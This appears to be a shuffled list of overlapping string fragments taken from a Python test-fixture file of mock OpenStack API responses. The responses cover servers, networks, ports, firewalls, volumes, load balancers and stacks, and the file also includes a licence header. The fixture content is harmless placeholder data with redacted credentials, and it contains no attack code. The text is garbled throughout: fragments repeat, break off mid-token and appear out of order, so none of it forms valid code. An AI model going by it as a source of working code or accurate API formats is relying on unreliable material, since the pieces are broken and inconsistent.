"\"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\",",
"} ], \"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0,",
"UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS =",
"\"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\",",
"\"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST = { \"servers\":",
"\"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\":",
"[], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\",",
"\"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\":",
"'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58'",
"PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, {",
"\"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\",",
"\"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\":",
"\"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\":",
"License for the specific language governing permissions and limitations # under the License.",
"\"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] +",
"\"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = {",
"STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name':",
"{ \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\":",
"\"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\":",
"True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0]",
"= [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" }",
"True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\",",
"u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types':",
"LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1,",
"u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST",
"Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT,",
"\"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\":",
"\"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ]",
"\"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True",
"'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links':",
"], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": {",
"] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\":",
"FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS",
"\"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\":",
"\"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST = { \"security_groups\": [",
"\"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\":",
"'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' },",
"\"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, {",
"alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ],",
"{ \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\":",
"] } SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\":",
"{ \"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\":",
"False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\":",
"\"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] }",
"\"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [],",
"\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\":",
"\"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST = {",
"\"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False,",
"\"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\":",
"u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a'",
"'225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292'",
"\"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\",",
"\"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None,",
"\"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\":",
"None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID",
"[{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network",
"\"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST =",
"\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\":",
"[ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\":",
"False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ],",
"True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ]",
"METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\":",
"{ 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\":",
"FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True,",
"PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\": [",
"\"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\":",
"\"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4",
"}, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\":",
"= { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\":",
"{u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id':",
"} ] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at':",
"License. You may obtain # a copy of the License at # #",
"\"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\",",
"port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]}",
"False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, { \"name\":",
"\"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\",",
"test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\":",
"\"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\",",
"[ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\":",
"= { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [",
"{ \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, {",
"\"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8'",
"\"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0,",
"\"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0]",
"= [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"]",
"\"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] }",
"} ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None,",
"\"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\":",
"ANY KIND, either express or implied. See the # License for the specific",
"} ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\":",
"\"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\":",
"\"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\":",
"} ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\":",
"} ] } SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\",",
"}, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\":",
"\"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None,",
"the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL =",
"{ \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ],",
"\"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\":",
"{u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z'",
"\"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\":",
"\"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\",",
"] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000',",
"None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\",",
"\"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\":",
"[ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\":",
"\"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\":",
"\"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\",",
"\"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID,",
"\"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\": [ { \"status\":",
"'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\":",
"\"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, {",
"\"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\",",
"\"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\":",
"u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'},",
"\"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\", \"name\":",
"u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10,",
"language governing permissions and limitations # under the License. TOKEN_ID = '<KEY>' USER_ID",
"See the # License for the specific language governing permissions and limitations #",
"\"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": {",
"\"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\":",
"None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\":",
"law or agreed to in writing, software # distributed under the License is",
"\"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\",",
"\"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\":",
"\"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\",",
"\"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None,",
"# a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"% AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel':",
"= 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT =",
"{}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\",",
"\"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" }",
"{ \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\",",
"None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\",",
"'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service',",
"True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] }",
"\"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\":",
"10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\":",
"[\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, {",
"\"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\":",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"= { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [],",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network' }, { 'endpoints': [{",
"'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS =",
"None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\",",
"\"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\":",
